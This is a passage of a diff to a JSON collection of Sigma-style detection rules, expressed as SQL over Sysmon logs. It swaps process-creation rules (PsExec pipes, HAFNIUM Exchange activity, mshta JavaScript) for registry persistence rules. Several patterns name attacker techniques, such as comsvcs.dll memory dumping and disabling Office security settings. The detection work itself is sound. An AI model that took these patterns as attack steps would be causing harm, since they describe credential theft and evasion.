'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (Image = 'System')))" ], - "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" + "filename": "registry_set_taskcache_entry.yml" }, { - "title": "MMC20 Lateral Movement", - "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", - "status": "test", - "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", - "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", + "title": "Potential Persistence Via Scrobj.dll COM Hijacking", + "id": "fe20dda1-6f37-4379-bbe0-a98d400cae90", + "status": "experimental", + "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1021.003" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the dll." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%InprocServer32\\\\(Default)' ESCAPE '\\' AND Details LIKE 'C:\\\\WINDOWS\\\\system32\\\\scrobj.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" + "filename": "registry_set_persistence_scrobj_dll.yml" }, { - "title": "Suspicious Svchost Process", - "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", - "status": "experimental", - "description": "Detects a suspicious svchost process start", - "author": "Florian Roth (Nextron Systems)", + "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", + "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", + "status": "test", + "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.persistence", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentImage = '') OR (ParentImage = '') OR (ParentImage = '-')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_svchost_susp_parent_process.yml" + "filename": "registry_set_chrome_extension.yml" }, { - "title": "Renamed ZOHO Dctask64 Execution", - "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", - "status": "test", - "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", - "author": "Florian Roth (Nextron Systems)", + "title": "CurrentVersion NT Autorun Keys Modification", + "id": "cbf93e5d-ca6c-4722-8bea-e9119007c248", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1055.001", - "attack.t1202", - "attack.t1218" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown yet" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\VmApplet%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Taskman%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GpExtensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AppSetup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AlternateShells\\\\AvailableShells%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\IconServiceLib%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Font Drivers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Load%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\DisableExceptionChainValidation' ESCAPE '\\' OR TargetObject LIKE '%\\\\MitigationOptions' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\ClickToRunStore\\\\HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\PreviousPolicyAreas%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\MaxNoGPOListChangesInterval%' ESCAPE '\\') AND Details IN ('DWORD (0x00000009)', 'DWORD (0x000003c0)')) OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Delete Cached Update Binary' ESCAPE '\\' AND Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe\"' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_dctask64.yml" + "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml" }, { - "title": "HAFNIUM Exchange Exploitation Activity", - "id": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", - "status": "test", - "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Persistence Via TypedPaths", + "id": "086ae989-9ca6-4fe7-895a-759c5544f247", + "status": "experimental", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546", - "attack.t1053" + "attack.persistence" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%attrib%' ESCAPE '\\' AND CommandLine LIKE '% +h %' ESCAPE '\\' AND CommandLine LIKE '% +s %' ESCAPE '\\' AND CommandLine LIKE '% +r %' ESCAPE '\\' AND CommandLine LIKE '%.aspx%' ESCAPE '\\') OR (Image LIKE '%\\\\ProgramData\\\\VSPerfMon\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%VSPerfMon%' ESCAPE '\\')) OR (Image LIKE '%Opera\\_browser.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\')) OR Image LIKE '%Users\\\\Public\\\\opera\\\\Opera\\_browser.exe' ESCAPE '\\' OR (CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%Temp\\\\\\_\\_output%' ESCAPE '\\') OR (Image LIKE '%\\\\makecab.exe' ESCAPE '\\' AND CommandLine LIKE '%inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dmp.zip%' ESCAPE '\\') OR (Image LIKE '%\\\\makecab.exe' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' OR CommandLine LIKE '%compressionmemory%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\')) OR (CommandLine LIKE '% -t7z %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Programdata\\\\pst%' ESCAPE '\\' AND CommandLine LIKE '%\\\\it.zip%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\comsvcs.dll%' ESCAPE '\\' AND CommandLine LIKE '%Minidump%' ESCAPE '\\' AND CommandLine LIKE '%full %' ESCAPE '\\' AND CommandLine LIKE '%\\\\inetpub\\\\wwwroot%' ESCAPE '\\') OR (CommandLine LIKE '%Windows\\\\Temp\\\\xx.bat%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\WwanSvcdcs%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\Temp\\\\cw.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_hafnium.yml" + "filename": "registry_set_persistence_typed_paths.yml" }, { - "title": "Suspicious JavaScript Execution Via Mshta.EXE", - "id": "67f113fa-e23d-4271-befa-30113b3e08b1", + "title": "Disable Microsoft Office Security Features", + "id": "7c637634-c95d-4bbf-b26c-a82510874b34", "status": "test", - "description": "Detects execution of javascript code using \"mshta.exe\".", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Disable Microsoft Office Security Features by registry", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.005" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_mshta_javascript.yml" + "filename": "registry_set_disable_microsoft_office_security_features.yml" }, { - "title": "Directory Removal Via Rmdir", - "id": "41ca393d-538c-408a-ac27-cf1e038be80c", + "title": "Add DisallowRun Execution to Registry", + "id": "275641a5-a492-45e2-a817-7c81e9d9d3e9", "status": "experimental", - "description": "Detects execution of the builtin \"rmdir\" command in order to delete directories.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", + "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1070.004" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%rmdir%' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%/q%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\DisallowRun' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_cmd_rmdir_execution.yml" + "filename": "registry_set_disallowrun_execution.yml" }, { - "title": "PsExec Default Named Pipe", - "id": "f3f3a972-f982-40ad-b63c-bca6afdfad7c", - "status": "test", - "description": "Detects PsExec service installation and execution events (service and Sysmon)", - "author": "Thomas Patzke", + "title": "Modify User Shell Folders Startup Value", + "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", + "status": "experimental", + "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" ], - "filename": "pipe_created_psexec_default_pipe.yml" + "filename": "registry_set_susp_user_shell_folders.yml" }, { - "title": "PsExec Pipes Artifacts", - "id": "9e77ed63-2ecf-4c7b-b09d-640834882028", - "status": "test", - "description": "Detecting use PsExec via Pipe Creation/Access to pipes", - "author": "Nikita Nazarov, oscd.community", + "title": "CurrentVersion Autorun Keys Modification", + "id": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.execution", - "attack.t1569.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate Administrator activity" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE 'psexec%' ESCAPE '\\' OR PipeName LIKE 'paexec%' ESCAPE '\\' OR PipeName LIKE 'remcom%' ESCAPE '\\' OR PipeName LIKE 'csexec%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\System\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Explorer\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group 